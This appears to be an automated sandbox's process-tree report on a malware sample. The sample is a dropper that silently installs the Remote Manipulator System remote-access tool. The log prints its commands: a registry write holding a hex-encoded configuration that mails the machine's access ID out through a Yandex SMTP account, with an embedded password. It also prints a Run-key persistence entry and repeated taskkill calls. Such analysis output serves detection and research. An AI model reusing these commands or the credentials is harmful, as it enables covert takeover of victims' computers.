C:\Users\Admin\AppData\Local\Temp\is-T8S6A.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp"C:\Users\Admin\AppData\Local\Temp\is-T8S6A.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp" /SL5="$20120,4482184,721408,C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping -n 2 Ping-ip.hldns.ru|find "TTL="3⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Windows\SysWOW64\PING.EXEping -n 2 Ping-ip.hldns.ru4⤵
- Runs ping.exe
PID:3416
-
-
C:\Windows\SysWOW64\find.exefind "TTL="4⤵PID:3144
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""3⤵
- Suspicious use of WriteProcessMemory
PID:204 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host\Parameters" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313038223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b43434136343745432d313543392d344239392d424538332d4337434346423645353244337d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393130383c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e534d54502e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e706175373838377061754079616e6465782e72753c2f656d61696c3e3c7375626a6563743e496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2c2c2671756f743b49443a20254944252671756f743b2c2671756f743bd0a1d0b5d180d0b2d0b5d1803a2025534552564552252671756f743b2c2c2671756f743bd098d0bcd18f20d0bfd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18f3a2025555345524e414d45252671756f743b2c2671756f743bd09dd0b0d0b7d0b2d0b0d0bdd0b8d0b520d0bad0bed0bcd0bfd18cd18ed182d0b5d180d0b03a2025434f4d504e414d45252671756f743b2c2671756f743bd09fd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18c20d0bfd180d0b5d0b4d181d182d0b0d0b2d0b8d0bbd181d18f20d0bad0b0d0ba3a202553454c464944252671756f743b2c3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a4⤵PID:3564
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 34⤵
- Delays execution with timeout.exe
PID:1812
-
-
C:\ProgramData\Immunity\rutserv.exe"C:\ProgramData\Immunity\rutserv.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1020 -
C:\ProgramData\Immunity\rutserv.exeC:\ProgramData\Immunity\rutserv.exe -second5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2032
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2576
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3524
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2596
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1164
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2360
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3956
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:512
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4016
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3784
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1672
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4088
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2644
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3820
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3988
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3276
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3548
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3376
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3968
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1252
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2772
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3192
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3256
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1112
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3720
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4104
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4136
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4200
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4236
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4272
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4336
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4408
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4492
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4636
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4668
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4704
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4748
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4788
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4844
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4876
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4940
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4972
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:5004
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:5036
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:5068
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:5104
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:2184
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4116
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4176
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4232
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4264
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4288
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4308
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4356
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4452
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵
- Kills process with taskkill
PID:4600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4628
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im "rundll32.exe"4⤵PID:4652
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 94⤵
- Delays execution with timeout.exe
PID:4672
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "nots" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"4⤵
- Adds Run key to start application
PID:4720
-
-
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2840